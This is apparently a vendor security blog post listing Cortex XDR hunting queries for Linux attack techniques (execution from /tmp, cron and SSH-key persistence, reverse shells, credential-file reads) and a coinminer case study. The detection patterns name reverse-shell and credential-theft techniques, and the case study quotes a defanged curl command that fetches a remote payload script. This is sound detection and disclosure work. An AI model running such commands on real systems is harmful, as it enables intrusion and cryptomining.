* [Blog](https://www.paloaltonetworks.com.au/blog)
* [Security Operations](https://www.paloaltonetworks.com.au/blog/security-operations/)
* [Must-Read Articles](https://www.paloaltonetworks.com.au/blog/security-operations/category/must-read-articles/)
* Linux Threat Hunting with...

# Linux Threat Hunting with Cortex XDR

[](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.paloaltonetworks.com.au%2Fblog%2Fsecurity-operations%2Flinux-threat-hunting-with-cortex-xdr%2F)  
[](https://twitter.com/share?text=Linux+Threat+Hunting+with+Cortex+XDR&url=https%3A%2F%2Fwww.paloaltonetworks.com.au%2Fblog%2Fsecurity-operations%2Flinux-threat-hunting-with-cortex-xdr%2F)  
[](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.paloaltonetworks.com.au%2Fblog%2Fsecurity-operations%2Flinux-threat-hunting-with-cortex-xdr%2F&title=Linux+Threat+Hunting+with+Cortex+XDR&summary=&source=)  
[](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://www.paloaltonetworks.com.au/blog/security-operations/linux-threat-hunting-with-cortex-xdr/&ts=markdown)  
\[\](mailto:?subject=Linux Threat Hunting with Cortex XDR)  
Link copied  
By [Raj Nepali](https://www.paloaltonetworks.com/blog/author/raj-nepali/?ts=markdown "Posts by Raj Nepali")  
Jul 11, 2023  
17 minutes  
[Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown)  
[Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown)  
[Cortex XDR](https://www.paloaltonetworks.com/blog/tag/cortex-xdr/?ts=markdown)  
[Linux](https://www.paloaltonetworks.com/blog/tag/linux/?ts=markdown)  
[MITRE ATT\&CK](https://www.paloaltonetworks.com/blog/tag/mitre-attck/?ts=markdown)  
[MTH](https://www.paloaltonetworks.com/blog/tag/mth/?ts=markdown)  
[Threat Hunting](https://www.paloaltonetworks.com/blog/tag/threat-hunting/?ts=markdown)  
[XQL](https://www.paloaltonetworks.com/blog/tag/xql/?ts=markdown)

## Executive Summary

The cyber threat landscape is always changing and attackers find new ways to compromise systems and achieve their objectives: espionage, ransomware, etc. With the proliferation of Linux operating systems, attackers are increasingly adapting their tactics, techniques, and procedures (TTPs) to target Linux systems. According to [W3Techs](https://w3techs.com/technologies/overview/operating_system), 81.2% of all websites known to them run on Linux servers. Also, due to their prevalence in critical infrastructures, cloud environments, and organizations, attackers are increasingly targeting Linux operating systems.

The most popular types of [threats](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/a-look-at-linux-threats-risks-and-recommendations) in Linux are crypto-miners, malicious scripts, webshells, rootkits, and ransomware while popular techniques are exploiting unpatched vulnerabilities, brute force attacks, deploying malware through compromised websites, etc.

In this post, we are going to take a look at some common ways to hunt for threats in Linux hosts using [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr) and [XQL](https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/Cortex-XDR-XQL-Language-Reference/Get-Started-with-XQL), following the MITRE [ATT\&CK](https://attack.mitre.org/matrices/enterprise/linux/) framework as a reference. Please note that this post does not cover all possible techniques. In future posts, we will break down each tactic and dive deeper. Some queries return a high number of results, it is advised to utilize a good baseline for your environment.

## Hunting Queries:

### Execution ([TA0002](https://attack.mitre.org/tactics/TA0002/)):

Attackers will most often have limited privileges upon initial access. They will try to execute additional programs for several purposes, for example: reconnaissance, privilege escalation, discovery, etc. Generally, attackers will download their payload to the host in world writable locations like /tmp, and /var/tmp and execute from there. The payload/file downloaded can be Linux executable or scripts. We can hunt this activity via the query below:

*// Description: Executions from /tmp or /var/tmp paths*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = PROCESS and event\_sub\_type = PROCESS\_START*

*| filter action\_process\_image\_path ~= "^\\/tmp.\*?$" or action\_process\_image\_path ~= "^\\/var\\/tmp.\*?$"*

*// Some potential filters Causality\_actor\_process\_image\_path: /bin/bash, /usr/sbin/crond*

*| fields agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, action\_process\_image\_path, action\_process\_image\_command\_line, action\_process\_image\_sha256 , causality\_actor\_process\_image\_path, causality\_actor\_process\_command\_line*

Additionally, we can also hunt for file download activity at these paths:

*// Description: File Download via curl or wget (T1105)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.FILE and (event\_sub\_type = ENUM.FILE\_CREATE\_NEW OR event\_sub\_type = ENUM.FILE\_WRITE ) and (actor\_process\_image\_name contains "curl" or actor\_process\_image\_name contains "wget")*

*// Action\_File\_Type =\> 18: Not Evaluated*

*| fields \_time, agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, actor\_process\_command\_line ,action\_file\_path, action\_file\_extension, action\_file\_type, action\_file\_size, causality\_actor\_process\_image\_path,causality\_actor\_process\_command\_line*

Another popular way for malware to get into the host is via trojanized applications executed by users. It is very common for users to download files via the internet and execute on the host. It is extremely important to baseline process executions on the hosts in order to detect outliers.

*// Description: Apps installed on the host via dpkg -i or double click on the .deb file*

*// When the app is installed via double click, we see two events*

*// --fsys-tarfile: Extracts the filesystem tree data from a binary package*

*// --control: Extracts the control information from archive into the specified directory*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = PROCESS and event\_sub\_type = PROCESS\_START and (action\_process\_image\_command\_line contains "dpkg -i" or action\_process\_image\_command\_line contains "dpkg-deb" ) and action\_process\_image\_command\_line contains ".deb"*

*// Reduce some noise*

*| filter (action\_process\_image\_command\_line not contains """fonts-dejavu""") and (causality\_actor\_process\_command\_line not contains "apt.systemd.daily")*

*| fields \_time, agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, action\_process\_image\_path, action\_process\_image\_command\_line, causality\_actor\_process\_command\_line*

Additionally, execution can occur via scheduled tasks/jobs ([T1053](https://attack.mitre.org/techniques/T1053/)) which we will cover in the Persistence section.

### Persistence ([TA0003](https://attack.mitre.org/tactics/TA0003/)):

Once the attacker is on the host, the obvious next step is to establish persistence to maintain their access to the system from reboots, password changes, detections, etc. This can be achieved via several ways. The most obvious way is to create a user account on the host.

*// Description: Add User*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter action\_process\_image\_command\_line contains "useradd"*

*| fields agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, causality\_actor\_process\_image\_path, os\_actor\_process\_image\_path, action\_process\_image\_path, action\_process\_image\_command\_line*

Another common technique we see is to add attackers' public key to the authorized\_keys on the host in the cases when SSH is accessible. This allows the attackers to SSH into the host without requiring passwords.

*// Description: SSH Persistence via authorized\_keys*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.FILE and (event\_sub\_type = ENUM.FILE\_CREATE\_NEW or event\_sub\_type = ENUM.FILE\_WRITE) and action\_file\_path contains "authorized\_keys"*

*| fields \_time, agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_path, action\_file\_path*

RCscripts can also be used to establish persistence on the hosts. Although this needs root permission.

*// Description: Persistence via Boot Logon Initialization scripts/RC Scripts (T1037.004)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.FILE and (event\_sub\_type = ENUM.FILE\_CREATE\_NEW or event\_sub\_type = ENUM.FILE\_WRITE) and (action\_file\_path ~= "\\/etc\\/rc.(local|common)")*

*| fields \_time, agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_path, action\_file\_path*

*// Description: Persistence via Unix Shell Configuration Modification (T1546.004)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.FILE and (event\_sub\_type = ENUM.FILE\_CREATE\_NEW or event\_sub\_type = ENUM.FILE\_WRITE) and (action\_file\_path ~= "\\/etc\\/profile" or action\_file\_path ~= "\\/home\\/.\*\\/\\.(bash.\*|profile)")*

*// Reduce some noise*

*| filter action\_file\_path not contains "bash\_history"*

*| fields \_time, agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_path, action\_file\_path*

Another popular technique is to schedule tasks on the hosts. These can be achieved via "at" jobs, cronjobs, or systemd timers. At jobs executes the program once at the specified time, while Cron jobs are recurring jobs at the specified intervals.

*// Description: Persistence via "at"*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.PROCESS and event\_sub\_type = ENUM.PROCESS\_START and (causality\_actor\_process\_image\_path contains "atd")*

*| fields agent\_hostname, actor\_effective\_username, causality\_actor\_process\_image\_path, actor\_process\_image\_path, action\_process\_image\_path, action\_process\_image\_command\_line*

*// Description: CRON Job Add*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = FILE //and (event\_sub\_type = FILE\_WRITE OR event\_sub\_type = FILE\_CREATE\_NEW)*

*| filter action\_file\_path contains "/etc/cron" OR action\_file\_path contains "/var/spool/cron"*

*| fields \_time, agent\_hostname, actor\_effective\_username, action\_file\_path, actor\_process\_image\_name, actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_path, causality\_actor\_process\_command\_line, event\_type, event\_sub\_type*

*// Description: Persistence via CRON, Processes started by CRON job*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = PROCESS and event\_sub\_type = PROCESS\_START*

*// Causality is usually cron and crond, additionally you can also look for anacron*

*| filter causality\_actor\_process\_image\_name contains "cron"*

*| fields \_time, agent\_hostname, actor\_effective\_username, action\_process\_image\_command\_line, actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_name,causality\_actor\_process\_command\_line*

*| dedup action\_process\_image\_command\_line*

Finally, web shells are a popular technique to establish persistence on web servers. Web shell is a small program that can be invoked on the web server.

*// Description: WebShells write on the host*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.FILE and (event\_sub\_type = ENUM.FILE\_CREATE\_NEW OR event\_sub\_type = ENUM.FILE\_WRITE ) and action\_file\_path contains "www" and action\_file\_extension in ("php", "html")*

*| filter actor\_effective\_username contains "www-data" and actor\_process\_image\_path contains "apache"*

*| fields \_time, agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, actor\_process\_command\_line,causality\_actor\_process\_command\_line, action\_process\_image\_command\_line , action\_file\_path*

*// Description: Web Shell Activity*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.PROCESS*

*| filter causality\_actor\_process\_image\_path contains "apache"*

*//Filter for shell activities*

*| filter actor\_process\_image\_path contains "/bin/bash" OR actor\_process\_image\_path contains "/bin/sh"*

*// more filtering can be done using actor\_effective\_username contains "www-data"*

*| filter (actor\_effective\_username contains """www-data""")*

*| fields \_time, agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_path, causality\_actor\_process\_command\_line, action\_process\_image\_path, action\_process\_image\_command\_line*

### Privilege Escalation ([TA0004](https://attack.mitre.org/tactics/TA0004/)):

Attackers will look for ways to elevate privileges once they have a foothold into the network. There are many techniques to achieve this. Setuid and SetGid allow a program to run in a different user's context. Attackers can find and abuse programs with setuid or setgid bit set to execute it in a privileged context.

*// Description: Search for setuid and setgid files (T1548.001)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.PROCESS*

*| filter action\_process\_image\_path contains "find" and action\_process\_image\_command\_line contains "-perm" and (action\_process\_image\_command\_line contains "-4000" and action\_process\_image\_command\_line contains "-2000")*

*| fields \_time, agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_path, causality\_actor\_process\_command\_line, action\_process\_image\_path, action\_process\_image\_command\_line*

Attackers can abuse systemd services for privilege escalation.

*// Description: Systemd service/timer creation (T1543.002)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = FILE and (event\_sub\_type = FILE\_WRITE OR event\_sub\_type = FILE\_CREATE\_NEW) and (action\_file\_extension = "service" OR action\_file\_extension = "timer")*

*| filter action\_file\_path contains "/etc/systemd/" OR action\_file\_path contains "/usr/lib/systemd" OR action\_file\_path contains "config/systemd/"*

*| fields \_time, agent\_hostname, actor\_effective\_username, action\_file\_path, actor\_process\_image\_name, actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_path, causality\_actor\_process\_command\_line*

*| dedup agent\_hostname, action\_file\_path*

NOTE: Privilege Escalation via Scheduled Tasks, please refer to Persistence section

### Defense Evasion ([TA0005](https://attack.mitre.org/tactics/TA0005/)):

Attackers will use different techniques to avoid detection by security controls or defenders.

*//Description: Directory/ File Permission Modification (T1222.002)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.PROCESS and (action\_process\_image\_command\_line contains "chmod" or action\_process\_image\_command\_line contains "chown" or action\_process\_image\_command\_line contains "chattr")*

*| fields agent\_hostname, causality\_actor\_process\_image\_path ,actor\_process\_image\_path , action\_process\_image\_path, action\_process\_image\_command\_line*

Additionally, attackers can hide Files and Directories to evade detection.

*// Description: Hide File or a Directory (T1564.001)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.FILE and (event\_sub\_type = ENUM.FILE\_CREATE\_NEW OR event\_sub\_type = ENUM.FILE\_WRITE or event\_sub\_type = ENUM.FILE\_DIR\_CREATE OR event\_sub\_type = ENUM.FILE\_DIR\_WRITE )*

*| alter dir\_name = regextract(action\_file\_path, "\\/(\\.\\w+)$")*

*| filter (action\_file\_name ~= "^\\.\\w+" or dir\_name ~= "^\\.\\w+")*

*| fields agent\_hostname, action\_file\_path, action\_file\_name, dir\_name,event\_type, event\_sub\_type, action\_file\_mode, action\_file\_size, action\_file\_type*

*// Additionally we can use common paths where these might run from /tmp, /var/tmp*

Another obvious technique to evade detection is by disabling security tools/services on the host.

*// Description: Disable Security Tools (T1562.001)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = PROCESS and event\_sub\_type = PROCESS\_START and*

*(lowercase(action\_process\_image\_command\_line) contains "stop" or lowercase(action\_process\_image\_command\_line) contains "disable" or lowercase(action\_process\_image\_command\_line) contains "off") and*

*(lowercase(action\_process\_image\_command\_line) contains "iptables" or*

*lowercase(action\_process\_image\_command\_line) contains "ip6tables" or*

*lowercase(action\_process\_image\_command\_line) contains "firewalld" or*

*lowercase(action\_process\_image\_command\_line) contains "falcon-sensor" or*

*lowercase(action\_process\_image\_command\_line) ~= "setenforce\\s\*0" or*

*lowercase(action\_process\_image\_command\_line) contains "ufw " or*

*lowercase(action\_process\_image\_command\_line) contains " ufw" or*

*lowercase(action\_process\_image\_command\_line) contains "rsyslog")*

*| fields agent\_hostname, actor\_process\_image\_name, actor\_process\_image\_command\_line, actor\_effective\_username, action\_process\_image\_name, action\_process\_image\_path, action\_process\_image\_command\_line*

### Credential Access ([TA0006](https://attack.mitre.org/tactics/TA0006/)):

During the attacks, attackers are interested in acquiring credentials for later use to escalate privilege, move laterally, etc. One of the easy ways is to look for files that potentially store credentials.

*// Description: Password files search (T1552.001)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter event\_type = ENUM.PROCESS and action\_process\_image\_path contains "find" and (action\_process\_image\_command\_line contains "password" or action\_process\_image\_command\_line contains "login")*

*| fields \_time, agent\_hostname, causality\_actor\_process\_image\_path, causality\_actor\_process\_command\_line, actor\_process\_image\_path, actor\_process\_command\_line, action\_process\_image\_path, action\_process\_image\_command\_line*

*// Description: Processes Reading Credential Files*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.FILE and event\_sub\_type = ENUM.FILE\_OPEN and (action\_file\_path = "\*/etc/shadow\*" or action\_file\_path = "\*/etc/login\*" or action\_file\_path = "\*/proc/\*/maps/\*" or action\_file\_path = "\*/etc/login.defs\*")*

*| fields agent\_hostname, causality\_actor\_process\_image\_path, actor\_process\_image\_path, actor\_process\_command\_line, action\_file\_path,event\_id*

Another approach to acquire credentials is to dump memory and look for credentials in memory dumps.

*// Description: Hunt Memory Dumping (T1003.007)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = FILE and (action\_file\_path ~= "^\\/proc\\/\\d+\\/maps" or action\_file\_path ~= "^\\/proc\\/\\d+\\/mem")*

*// Usually these are done via dd, also watch out for gcore, gdb as well*

*| filter actor\_process\_image\_path contains "dd"*

*| fields agent\_hostname, causality\_actor\_process\_image\_path ,actor\_process\_image\_path, actor\_process\_command\_line , action\_process\_image\_path, action\_file\_path, event\_type, event\_sub\_type*

Private Keys stored in the host can be very valuable to attackers.

*// Description: Private Keys Enumeration (T1552.004)*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.PROCESS and action\_process\_image\_path contains "find" and (action\_process\_image\_command\_line contains "pem" or*

*action\_process\_image\_command\_line contains "pfx" or*

*action\_process\_image\_command\_line contains "key" or*

*action\_process\_image\_command\_line contains "pgp" or*

*action\_process\_image\_command\_line contains "gpg" or*

*action\_process\_image\_command\_line contains "ppk" or*

*action\_process\_image\_command\_line contains "p12" or*

*action\_process\_image\_command\_line contains "cer" or*

*action\_process\_image\_command\_line contains "p7b" or*

*action\_process\_image\_command\_line contains "asc" )*

*| fields \_time, agent\_hostname, causality\_actor\_process\_image\_path, causality\_actor\_process\_command\_line, actor\_process\_image\_path, actor\_process\_command\_line, action\_process\_image\_path, action\_process\_image\_command\_line*

### Discovery ([TA0007](https://attack.mitre.org/tactics/TA0007/))

Discovery is an important part of the attack lifecycle to gain information on the systems, and security posture that in turn helps to make further strategies to continue the attack.

*// Description: General Reconnaissance/Discovery commands*

*config case\_sensitive = false timeframe=1d*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = PROCESS and event\_sub\_type = PROCESS\_START*

*| filter action\_process\_image\_command\_line contains "whoami" or*

*action\_process\_image\_command\_line contains "history" or*

*action\_process\_image\_command\_line contains "passwd" or*

*action\_process\_image\_command\_line contains "uname" or*

*action\_process\_image\_command\_line contains "ps" or*

*action\_process\_image\_command\_line contains "groups" or*

*action\_process\_image\_command\_line contains "smbclient" or*

*action\_process\_image\_command\_line contains "systemctl"*

*| fields agent\_hostname, actor\_effective\_username ,actor\_process\_image\_path, actor\_process\_command\_line, causality\_actor\_process\_image\_path,os\_actor\_process\_image\_path ,action\_process\_image\_name, action\_process\_image\_path, action\_process\_image\_command\_line*

*| comp count\_distinct(action\_process\_image\_name) as distinct\_count\_commands\_observed, values(action\_process\_image\_name) as commands\_observed by agent\_hostname, actor\_effective\_username, actor\_process\_image\_path, actor\_process\_command\_line*

*// Filter for processes that trigger 3 or more recon commands (configurable)*

*| filter distinct\_count\_commands\_observed \>= 3*

### Command and Control ([TA0011](https://attack.mitre.org/tactics/TA0011/))

Command and control (C2) allows attackers to remotely control the host. Please note that there are several ways to spawn a reverse shell, the example below only shows one such technique. For more on C2 hunting, please refer to [this](https://www.paloaltonetworks.com/blog/security-operations/from-the-hunter-diaries-detecting-c2-servers/).

*// Description: Hunting Reverse Shells*

*config case\_sensitive = false*

*| dataset = xdr\_data*

*| filter agent\_os\_type = AGENT\_OS\_LINUX*

*| filter event\_type = ENUM.PROCESS and (actor\_process\_command\_line contains "/dev/tcp" OR action\_process\_image\_command\_line contains "/dev/tcp/")*

*| fields agent\_hostname, actor\_effective\_username, causality\_actor\_process\_image\_path, actor\_process\_image\_path, actor\_process\_command\_line, action\_process\_image\_command\_line*

## Case Study: Mine your own business

The Unit 42 Managed Threat Hunting team recently identified a suspicious binary in one of customer environments executing from /var/tmp directory. Upon further investigation, we identified this binary as a coinminer. The causality for this binary was a cron job setup on the host via crontab. The cronjob was added via SSH session from an internal unmanaged host.

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/07/word-image-297986-1-1.png)

Cron job is set to execute the binaries (/var/tmp/.systemd, /var/tmp/.update) dropped via SSH session as well as download and execute further payload via curl from an external host on a regular interval as well as upon reboot.

*curl -fsSL http\[:\]//pw\[.\]pwndns\[.\]pw/root.sh*

## Summary

Due to the increasing popularity of Linux operating systems, attackers are adapting their TTPs to target Linux systems. We are seeing an uptick in different threat actors targeting Linux operating systems. Most popular threats include ransomware, custom malware, rootkits, exploits against the operating systems as well as living off the land techniques. It is expected that attackers will continue targeting these systems.

Reducing attack surface and hardening the systems will make the attackers life difficult, however many organizations lack the expertise to properly harden these systems. There are several hardening guides organizations can leverage to properly harden these devices. Additionally, in this post we provide several "low hanging" hunting queries organizations can use to catch the attackers.

## About Unit 42 Managed Services

Unit 42 Managed Threat Hunting is a powerful service that empowers organizations to stay ahead of the ever-evolving threat landscape. Led by the renowned Unit 42 threat intelligence team, this service is designed to identify hidden attacks that would otherwise go undetected. Our team of expert threat hunters uses a combination of human expertise, big data analytics and comprehensive threat intelligence to surface malicious tactics, techniques, and procedures hiding in plain sight. This cutting-edge service is fueled by data collected and retained in the Cortex Data Lake, ensuring that organizations have access to the most comprehensive and accurate information available. With Unit 42 Managed Threat Hunting, organizations can take proactive steps to protect their assets and stay one step ahead of cybercriminals. For more information, visit [https://www.paloaltonetworks.com/unit42/respond/managed-threat-hunting](https://www.paloaltonetworks.com/unit42/respond/managed-threat-hunting)

*** ** * ** ***

## Related Blogs

### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown)

[#### Threat Hunting with Mark of The Web Using Cortex XDR](https://www.paloaltonetworks.com.au/blog/security-operations/threat-hunting-with-mark-of-the-web-using-cortex-xdr/)

### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Uncategorized](https://www.paloaltonetworks.com/blog/category/uncategorized/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown)

[#### Hunt and Investigate Removable Drive Threats with Cortex XDR](https://www.paloaltonetworks.com.au/blog/security-operations/hunt-and-investigate-removable-drive-threats-with-cortex-xdr/)

### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown)

[#### Forrester Names Palo Alto Networks a Leader in XDR](https://www.paloaltonetworks.com.au/blog/2024/06/forrester-names-palo-alto-networks-a-leader-in-xdr/)

### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown), [Unit 42](https://www.paloaltonetworks.com/blog/category/unit42/?ts=markdown), [Web Security](https://www.paloaltonetworks.com/blog/category/web-security/?ts=markdown)

[#### Unit 42 Strikes Oil in MITRE Engenuity Managed Services Evaluation](https://www.paloaltonetworks.com.au/blog/2022/11/unit-42-mitre-managedservices-2022/)

### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown)

[#### XDR + XSOAR: A Dynamic Duo](https://www.paloaltonetworks.com.au/blog/security-operations/xdr-xsoar-a-dynamic-duo/)

### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown)

[#### The Hunter Diaries Part 2 - An Inside Job](https://www.paloaltonetworks.com.au/blog/security-operations/the-hunter-diaries-part-2-an-inside-job/)

### Subscribe to Security Operations Blogs!

Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more.
![spinner](https://www.paloaltonetworks.com.au/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up  
Please enter a valid email.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder.  
This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.  
{#footer} {#footer}

## Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown)

* [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown)

* [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown)

